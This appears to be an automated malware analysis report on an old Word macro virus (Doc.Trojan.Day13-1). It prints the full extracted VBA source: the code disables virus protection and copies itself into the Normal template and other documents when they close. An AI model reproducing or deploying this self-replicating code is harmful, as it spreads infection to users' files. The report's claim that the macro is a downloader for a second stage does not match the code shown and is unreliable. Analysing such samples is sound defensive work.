Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 241745f814d772f8…

MALICIOUS

Office (OLE)

36.5 KB Created: 1997-09-17 10:18:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 4e3406a5d00e5803a47da92467988b36 SHA-1: 934ef90dceefd58fcc7ba5d3ba0ff420402636d2 SHA-256: 241745f814d772f8d63d72ca65b629befd15430b8d2c1ff92f0534727101df01
140 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The file is identified as malicious by ClamAV, with critical heuristics indicating the presence of VBA macros and an extracted artifact also flagged by ClamAV. The VBA macro code within 'macros.bas' is designed to execute upon document closure, attempting to disable virus protection and potentially send or save code. While the exact payload is not directly visible due to truncation, the structure suggests it's a downloader for a secondary stage.

Heuristics 2

  • ClamAV: Doc.Trojan.Day13-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Day13-1
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4644 bytes
SHA-256: cada6c99eb708d2450cad0d0d4b2b83deb8a75542976826b1ea701f5ad4f2a17
Detection
ClamAV: Win.Trojan.C-286
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Option Explicit
Private strCode As String
Private Sub Document_Close()
On Error Resume Next
With Options
.SaveNormalPrompt = False
.VirusProtection = False
End With
Dim tdCode As Object
Set tdCode = GetCodeModule(ThisDocument)
With tdCode
strCode = .Lines(1, .CountOfLines)
End With
If ThisDocument = NormalTemplate Then
With ActiveDocument
If .Path <> vbNullString Then
SendCode ActiveDocument
.Save
End If
End With
Else
SendCode NormalTemplate
End If
If Day(Now) = 13 Then
With Application.FileSearch
.NewSearch
.LookIn = Left(NormalTemplate.FullName, 3)
.SearchSubFolders = True
.FileName = "*.doc"
.MatchTextExactly = False
.FileType = msoFileTypeAllFiles
.Execute
Dim i As Integer
For i = 1 To .FoundFiles.Count
MsgBox .FoundFiles(i)
Next i
End With
End If
End Sub
Private Function GetCodeModule(objProject As Object) As Object
Set GetCodeModule = objProject.VBProject.VBComponents(1).CodeModule
End Function
Private Sub SendCode(objProject As Object)
Dim objCode As Object
Set objCode = GetCodeModule(objProject)
With objCode
.DeleteLines 1, .CountOfLines
.InsertLines 1, strCode
End With
End Sub

' Processing file: /opt/analyzer/scan_staging/49d4c433f93e4b8f835728bd5aedccc6.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 3356 bytes
' Line #0:
' Line #1:
' 	Option  (Explicit)
' Line #2:
' 	Dim (Private) 
' 	VarDefn strCode (As String)
' Line #3:
' 	FuncDefn (Private Sub Document_Close())
' Line #4:
' 	OnError (Resume Next) 
' Line #5:
' 	StartWithExpr 
' 	Ld Options 
' 	With 
' Line #6:
' 	LitVarSpecial (False)
' 	MemStWith SaveNormalPrompt 
' Line #7:
' 	LitVarSpecial (False)
' 	MemStWith VirusProtection 
' Line #8:
' 	EndWith 
' Line #9:
' 	Dim 
' 	VarDefn tdCode (As Object)
' Line #10:
' 	SetStmt 
' 	Ld ThisDocument 
' 	ArgsLd GetCodeModule 0x0001 
' 	Set tdCode 
' Line #11:
' 	StartWithExpr 
' 	Ld tdCode 
' 	With 
' Line #12:
' 	LitDI2 0x0001 
' 	MemLdWith CountOfLines 
' 	ArgsMemLdWith Lines 0x0002 
' 	St strCode 
' Line #13:
' 	EndWith 
' Line #14:
' 	Ld ThisDocument 
' 	Ld NormalTemplate 
' 	Eq 
' 	IfBlock 
' Line #15:
' 	StartWithExpr 
' 	Ld ActiveDocument 
' 	With 
' Line #16:
' 	MemLdWith Path 
' 	Ld vbNullString 
' 	Ne 
' 	IfBlock 
' Line #17:
' 	Ld ActiveDocument 
' 	ArgsCall SendCode 0x0001 
' Line #18:
' 	ArgsMemCallWith Save 0x0000 
' Line #19:
' 	EndIfBlock 
' Line #20:
' 	EndWith 
' Line #21:
' 	ElseBlock 
' Line #22:
' 	Ld NormalTemplate 
' 	ArgsCall SendCode 0x0001 
' Line #23:
' 	EndIfBlock 
' Line #24:
' 	Ld Now 
' 	ArgsLd Day 0x0001 
' 	LitDI2 0x000D 
' 	Eq 
' 	IfBlock 
' Line #25:
' 	StartWithExpr 
' 	Ld Application 
' 	MemLd FileSearch 
' 	With 
' Line #26:
' 	ArgsMemCallWith NewSearch 0x0000 
' Line #27:
' 	Ld NormalTemplate 
' 	MemLd FullName 
' 	LitDI2 0x0003 
' 	ArgsLd LBound 0x0002 
' 	MemStWith LookIn 
' Line #28:
' 	LitVarSpecial (True)
' 	MemStWith SearchSubFolders 
' Line #29:
' 	LitStr 0x0005 "*.doc"
' 	MemStWith FileName 
' Line #30:
' 	LitVarSpecial (False)
' 	MemStWith MatchTextExactly 
' Line #31:
' 	Ld msoFileTypeAllFiles 
' 	MemStWith FileType 
' Line #32:
' 	ArgsMemCallWith Execute 0x0000 
' Line #33:
' 	Dim 
' 	VarDefn i (As Integer)
' Line #34:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	MemLdWith FoundFiles 
' 	MemLd Count 
' 	For 
' Line #35:
' 	Ld i 
' 	ArgsMemLdWith FoundFiles 0x0001 
' 	ArgsCall MsgBox 0x0001 
' Line #36:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	NextVar 
' Line #37:
' 	EndWith 
' Line #38:
' 	EndIfBlock 
' Line #39:
' 	EndSub 
' Line #40:
' 	FuncDefn (Private Function GetCodeModule(objProject As Object, id_FFFE As Object) As Object)
' Line #41:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld objProject 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd Co
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.